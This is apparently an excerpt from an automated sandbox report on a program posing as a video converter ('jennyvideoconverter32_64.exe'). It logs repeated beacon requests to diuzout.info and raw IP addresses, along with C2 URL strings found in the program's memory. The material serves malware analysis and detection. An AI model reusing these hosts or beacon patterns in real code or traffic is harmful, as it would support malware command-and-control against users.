        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
        Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: diuzout.info
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.1
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/s
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df22
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df220160
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51?a
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12e
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337778653.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd8Yo
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?qbn1
